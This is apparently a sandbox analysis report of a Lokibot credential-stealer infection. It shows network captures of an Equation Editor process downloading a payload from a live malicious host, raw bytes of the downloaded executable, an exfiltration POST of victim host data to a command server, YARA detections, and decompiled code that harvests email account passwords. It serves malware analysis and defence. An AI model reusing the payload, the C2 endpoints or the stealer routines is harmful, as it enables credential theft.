Feb 16, 2021 07:02:48.024172068 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.024193048 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.024277925 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.024293900 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.024656057 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.024688005 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.024693966 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.024719000 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.024754047 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.024765015 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.024774075 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.024794102 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.024801016 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.024822950 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.024857998 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.024867058 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.024931908 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.024940968 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.024961948 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.024998903 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.025001049 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.025032997 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.025034904 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.025058031 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.025106907 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.025126934 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.025126934 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.025151014 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.025171041 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.025172949 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.025207043 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.025213957 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.025223970 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.025226116 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.025270939 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.025283098 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.025300980 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.025321007 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.025360107 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.025393963 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.025403023 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.025424957 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.025444031 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.025460958 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.025479078 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.025500059 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.025507927 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.025553942 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.025568962 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.025569916 CET	80	49167	103.141.138.123	192.168.2.22
Feb 16, 2021 07:02:48.025614977 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.025635004 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.670703888 CET	49167	80	192.168.2.22	103.141.138.123
Feb 16, 2021 07:02:48.670818090 CET	49165	443	192.168.2.22	172.67.8.238
Feb 16, 2021 07:02:50.873893023 CET	49168	80	192.168.2.22	185.208.180.121
Feb 16, 2021 07:02:50.999705076 CET	80	49168	185.208.180.121	192.168.2.22
Feb 16, 2021 07:02:50.999881983 CET	49168	80	192.168.2.22	185.208.180.121
Feb 16, 2021 07:02:51.005729914 CET	49168	80	192.168.2.22	185.208.180.121
Feb 16, 2021 07:02:51.128968954 CET	80	49168	185.208.180.121	192.168.2.22
Feb 16, 2021 07:02:51.129267931 CET	49168	80	192.168.2.22	185.208.180.121
Feb 16, 2021 07:02:51.255670071 CET	80	49168	185.208.180.121	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 16, 2021 07:02:44.463685989 CET	52197	53	192.168.2.22	8.8.8.8
Feb 16, 2021 07:02:44.512727976 CET	53	52197	8.8.8.8	192.168.2.22
Feb 16, 2021 07:02:45.061305046 CET	53099	53	192.168.2.22	8.8.8.8
Feb 16, 2021 07:02:45.124488115 CET	53	53099	8.8.8.8	192.168.2.22
Feb 16, 2021 07:02:45.124819994 CET	53099	53	192.168.2.22	8.8.8.8
Feb 16, 2021 07:02:45.185965061 CET	53	53099	8.8.8.8	192.168.2.22
Feb 16, 2021 07:02:45.203356981 CET	52838	53	192.168.2.22	8.8.8.8
Feb 16, 2021 07:02:45.260385036 CET	53	52838	8.8.8.8	192.168.2.22
Feb 16, 2021 07:02:45.260708094 CET	52838	53	192.168.2.22	8.8.8.8
Feb 16, 2021 07:02:45.309402943 CET	53	52838	8.8.8.8	192.168.2.22
Feb 16, 2021 07:02:46.157924891 CET	61200	53	192.168.2.22	8.8.8.8
Feb 16, 2021 07:02:46.235662937 CET	53	61200	8.8.8.8	192.168.2.22
Feb 16, 2021 07:02:50.794610023 CET	49548	53	192.168.2.22	8.8.8.8
Feb 16, 2021 07:02:50.857706070 CET	53	49548	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 16, 2021 07:02:44.463685989 CET	192.168.2.22	8.8.8.8	0xf63a	Standard query (0)	cutt.ly	A (IP address)	IN (0x0001)
Feb 16, 2021 07:02:46.157924891 CET	192.168.2.22	8.8.8.8	0x3a6e	Standard query (0)	stdyrusschinetwomast.dns.army	A (IP address)	IN (0x0001)
Feb 16, 2021 07:02:50.794610023 CET	192.168.2.22	8.8.8.8	0x23e5	Standard query (0)	becharnise.ir	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Feb 16, 2021 07:02:44.512727976 CET	8.8.8.8	192.168.2.22	0xf63a	No error (0)	cutt.ly	172.67.8.238	A (IP address)	IN (0x0001)
Feb 16, 2021 07:02:44.512727976 CET	8.8.8.8	192.168.2.22	0xf63a	No error (0)	cutt.ly	104.22.0.232	A (IP address)	IN (0x0001)
Feb 16, 2021 07:02:44.512727976 CET	8.8.8.8	192.168.2.22	0xf63a	No error (0)	cutt.ly	104.22.1.232	A (IP address)	IN (0x0001)
Feb 16, 2021 07:02:46.235662937 CET	8.8.8.8	192.168.2.22	0x3a6e	No error (0)	stdyrusschinetwomast.dns.army	103.141.138.123	A (IP address)	IN (0x0001)
Feb 16, 2021 07:02:50.857706070 CET	8.8.8.8	192.168.2.22	0x23e5	No error (0)	becharnise.ir	185.208.180.121	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

stdyrusschinetwomast.dns.army

becharnise.ir

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	103.141.138.123	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 16, 2021 07:02:46.460187912 CET	73	OUT	GET /receiprt/regasm.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Connection: Keep-Alive Host: stdyrusschinetwomast.dns.army
Feb 16, 2021 07:02:46.682566881 CET	75	IN	HTTP/1.1 200 OK Date: Tue, 16 Feb 2021 06:02:42 GMT Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38 Last-Modified: Tue, 16 Feb 2021 01:44:33 GMT ETag: "41c00-5bb6a3e863566" Accept-Ranges: bytes Content-Length: 269312 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e0 7b ab 66 a4 1a c5 35 a4 1a c5 35 a4 1a c5 35 ba 48 50 35 b6 1a c5 35 ba 48 41 35 99 1a c5 35 ba 48 46 35 d7 1a c5 35 83 dc be 35 a1 1a c5 35 a4 1a c4 35 d4 1a c5 35 ba 48 4f 35 a5 1a c5 35 ba 48 57 35 a5 1a c5 35 ba 48 51 35 a5 1a c5 35 ba 48 54 35 a5 1a c5 35 52 69 63 68 a4 1a c5 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e4 41 b2 5d 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f0 02 00 00 b2 c6 04 00 00 00 00 40 30 00 00 00 10 00 00 00 00 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 c8 04 00 04 00 00 6d 30 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 86 03 00 62 00 00 00 60 7d 03 00 3c 00 00 00 00 10 c8 04 18 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 71 ee 02 00 00 10 00 00 00 f0 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 86 00 00 00 00 03 00 00 88 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a8 74 c4 04 00 90 03 00 00 28 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 18 76 00 00 00 10 c8 04 00 78 00 00 00 a4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.${f555HP55HA55HF555555HO55HW55HQ55HT55Rich5PELA]@0@m0 b`}<v.textq `.rdata@@.datat(\|@.rsrcvx@@
Feb 16, 2021 07:02:46.682643890 CET	76	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 56 8d 45 08 50 8b f1 e8 61 19 00 00 c7 06 dc 01 43 00 8b c6 5e 5d c2 04 00 cc cc cc cc c7 01 dc 01 43 00 e9 a5 1a 00 00 cc cc cc cc cc 55 8b ec 56 8b f1 c7 06 dc 01 43 00 e8 8f 1a 00 00 f6 Data Ascii: UVEPaC^]CUVCEtVc^]UQVjMot!td$QuM^]UjhBdPV8C3PEduE
Feb 16, 2021 07:02:46.682719946 CET	78	IN	Data Raw: 8b c3 33 d2 66 89 14 48 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 8b 75 08 83 7e 1c 08 72 0c 8b 46 08 50 e8 58 17 00 00 83 c4 04 33 c9 51 c7 46 1c 07 00 00 00 c7 46 18 00 00 00 00 51 66 89 4e 08 e8 2a 50 00 00 cc cc cc cc cc cc Data Ascii: 3fHMdY_^[]u~rFPX3QFFQfN*PUw3R+]3sEPMEh\|CMQECOUEPjMQURj#u]UQMjh
Feb 16, 2021 07:02:46.682761908 CET	79	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 51 89 4d fc 8b 45 08 50 8b 4d fc e8 7b fd ff ff 8b 4d fc c7 01 28 02 43 00 8b 45 fc 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 51 89 4d fc 8b 45 fc c7 00 28 02 43 00 8b 4d fc e8 Data Ascii: UQMEPM{M(CE]UQME(CM]UQMMEtMQE]UQMEPM;M(CE]UjhBdP8C3PEdMQeM
Feb 16, 2021 07:02:46.906913042 CET	80	IN	Data Raw: fc e8 dc fe ff ff 50 e8 76 04 00 00 83 c4 10 8b 45 0c 50 8b 4d fc e8 b7 00 00 00 8b 45 fc 8b e5 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 08 89 4d f8 8b 45 f8 8b 48 18 3b 4d 08 73 05 e8 05 fa ff ff 8b 55 f8 8b 42 Data Ascii: PvEPME]UMEH;MsUB+E;EsMQ+UU}vREH+M+MQM`EEPUB+EPMGEPMQ+UUEPME]UMEEMHURM
Feb 16, 2021 07:02:46.906970978 CET	82	IN	Data Raw: ff 8b e5 5d c3 cc cc cc 8b ff 55 8b ec 8b 45 14 50 8b 4d 10 51 8b 55 0c 52 8b 45 08 50 e8 06 00 00 00 83 c4 10 5d c3 cc 8b ff 55 8b ec 8b 45 14 50 8b 4d 10 51 8b 55 0c 52 8b 45 08 50 e8 86 08 00 00 83 c4 10 8b 45 08 5d c3 cc cc cc cc cc cc cc cc Data Ascii: ]UEPMQUREP]UEPMQUREPE]UEPMQUREP]UEPMQUREPE]UEPdC]UEPhC]UEP
Feb 16, 2021 07:02:46.907010078 CET	83	IN	Data Raw: 8b 4d fc 8b 55 08 8b 02 89 41 04 8b 4d fc c7 41 08 00 00 00 00 8b 45 fc 8b e5 5d c2 08 00 8b ff 55 8b ec 83 ec 08 89 4d f8 8b 45 f8 c7 00 3c 04 43 00 8b 4d f8 8b 55 08 8b 42 08 89 41 08 8b 4d f8 83 79 08 00 74 61 8b 55 08 83 7a 04 00 74 4c 8b 45 Data Ascii: MUAMAE]UME<CMUBAMytaUztLEHQ"@EURPaMAUztEHQUREHQG^UBEMQPE]UQME<CMytUBP9]U
Feb 16, 2021 07:02:46.907059908 CET	85	IN	Data Raw: c4 04 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 51 89 4d fc 8b 4d fc e8 bf ff ff ff 8b 45 08 83 e0 01 74 0c 8b 4d fc 51 e8 2e fd ff ff 83 c4 04 8b 45 fc 8b e5 5d c2 04 00 cc cc 8b ff 55 8b ec 51 89 4d fc 8b 45 fc 83 c0 Data Ascii: ]UQMMEtMQ.E]UQMEPMQ]UEP[E}u\MQZuJPCu$PCPCDCh`BhDCMh\|CMQi5E]
Feb 16, 2021 07:02:46.907182932 CET	86	IN	Data Raw: 00 83 c4 14 a3 98 e4 07 05 83 3d 98 e4 07 05 00 75 3f c7 05 a0 f4 07 05 14 00 00 00 68 88 00 00 00 68 2c 07 43 00 6a 02 6a 04 8b 0d a0 f4 07 05 51 e8 f4 11 00 00 83 c4 14 a3 98 e4 07 05 83 3d 98 e4 07 05 00 75 0a b8 1a 00 00 00 e9 b1 00 00 00 c7 Data Ascii: =u?hh,CjjQ=uEUU}}ECMEEE}}fMU<t8MU<tMU<uM
Feb 16, 2021 07:02:46.907222986 CET	87	IN	Data Raw: 7d 08 01 75 07 8b 45 e4 eb 05 eb 03 8b 45 dc 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 08 8d 45 1c 89 45 fc 8b 4d fc 51 8b 55 18 52 8b 45 14 50 8b 4d 10 51 8b 55 0c 52 Data Ascii: }uEEMdY_^[]UEEMQUREPMQUREPEEE]UEPMQUREPMQUR>]UX"8C3EEE}u3fhQjC
Feb 16, 2021 07:02:46.907260895 CET	89	IN	Data Raw: f4 53 56 57 a1 38 93 43 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 e8 49 78 00 00 c7 45 fc 00 00 00 00 8b 45 08 50 e8 39 00 00 00 83 c4 04 89 45 e4 c7 45 fc fe ff ff ff e8 02 00 00 00 eb 06 e8 40 78 00 00 c3 8b 45 e4 8b 4d f0 64 89 0d 00 00 Data Ascii: SVW8C1E3PEdIxEEP9EE@xEMdY_^[]UP}EQkEU;UrE+Es3jMQ}EU+U9U}sEEEMMM

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	185.208.180.121	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Feb 16, 2021 07:02:51.005729914 CET	359	OUT	POST /fa13/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: becharnise.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4081BD40 Content-Length: 176 Connection: close
Feb 16, 2021 07:02:51.129267931 CET	360	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 32 00 34 00 34 00 37 00 31 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.ruAlbus724471ALBUS-PCk0DE4229FCF97F5879F50F8FD3HDgtP

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Feb 16, 2021 07:02:44.655622959 CET	172.67.8.238	443	192.168.2.22	49165	CN=www.cutt.ly CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	Sat Feb 08 01:00:00 CET 2020 Thu Nov 02 13:24:33 CET 2017	Thu Apr 08 14:00:00 CEST 2021 Tue Nov 02 13:24:33 CET 2027	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Feb 16, 2021 07:02:44.655622959 CET	172.67.8.238	443	192.168.2.22	49165	CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Nov 02 13:24:33 CET 2017	Tue Nov 02 13:24:33 CET 2027		7dcce5b76c8b17472d024758970a406b

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 944 Parent PID: 584

General

Start time:	07:01:50
Start date:	16/02/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f0d0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2344 Parent PID: 584

General

Start time:	07:02:10
Start date:	16/02/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 1276 Parent PID: 2344

General

Start time:	07:02:14
Start date:	16/02/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	269312 bytes
MD5 hash:	2559B5B8D60DD663DF52D0570F5973A9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, Author: Joe Security Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.2374661998.0000000000220000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, Author: Joe Security Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000003.2160266537.0000000000240000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 36%, ReversingLabs
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 1276 Parent PID: 2344 vbc.exeCOMMON

Executed Functions

Function 0040D069, Relevance: 12.6, Strings: 10, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t71;
				void* _t75;
				void* _t77;

				_t72 = _a4;
				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
				_t81 = _t71;
				if(_t71 != 0) {
					_push(__ebx);
					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
					_v8 = _v8 & 0x00000000;
					_v20 = _t40;
					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
					_v12 = _v12 & 0x00000000;
					_v32 = _t45;
					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
					_t77 = _t75 + 0x50;
					_v36 = _t47;
					if(_v8 != 0 || _v12 != 0) {
						E00405872( *0x49f934, _t71, 1, 0);
						E00405872( *0x49f934, _t67, 1, 0);
						_t74 = _v16;
						E00405872( *0x49f934, _v16, 1, 0);
						E00405781( *0x49f934, _v40);
						E00405872( *0x49f934, _v20, 1, 0);
						_push(_v8);
						E00405762(_v16,  *0x49f934, _v24);
						E00405872( *0x49f934, _v28, 1, 0);
						E00405781( *0x49f934, _v44);
						E00405872( *0x49f934, _v32, 1, 0);
						_push(_v12);
						E00405762(_t74,  *0x49f934, _v36);
						_t77 = _t77 + 0x88;
					} else {
						_t74 = _v16;
					}
					E0040471C(_t71);
					E0040471C(_t67);
					E0040471C(_t74); // executed
					E0040471C(_v20);
					E0040471C(_v24);
					E0040471C(_v28);
					E0040471C(_v32);
					E0040471C(_v36);
				}
				return 1;
			}

0x0040d070
0x0040d080
0x0040d084
0x0040d086
0x0040d08c
0x0040d0a0
0x0040d0ae
0x0040d0bd
0x0040d0c0
0x0040d0c5
0x0040d0c9
0x0040d0e3
0x0040d0f2
0x0040d101
0x0040d104
0x0040d109
0x0040d110
0x0040d11e
0x0040d123
0x0040d126
0x0040d12d
0x0040d145
0x0040d154
0x0040d15a
0x0040d166
0x0040d174
0x0040d186
0x0040d18e
0x0040d19a
0x0040d1ac
0x0040d1ba
0x0040d1cc
0x0040d1d1
0x0040d1dd
0x0040d1e2
0x0040d1e7
0x0040d1e7
0x0040d1e7
0x0040d1eb
0x0040d1f1
0x0040d1f7
0x0040d1ff
0x0040d207
0x0040d20f
0x0040d217
0x0040d21f
0x0040d227
0x0040d230

Strings

EmailAddress, xrefs: 0040D074
PopPassword, xrefs: 0040D0D0
SmtpPassword, xrefs: 0040D117
PopAccount, xrefs: 0040D0B6
PopPort, xrefs: 0040D0A7
PopServer, xrefs: 0040D099
SmtpServer, xrefs: 0040D0DC
Technology, xrefs: 0040D08D
SmtpPort, xrefs: 0040D0EB
SmtpAccount, xrefs: 0040D0FA

Memory Dump Source

Source File: 00000004.00000002.2374707642.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2374726593.000000000049B000.00000040.00020000.sdmp Download File
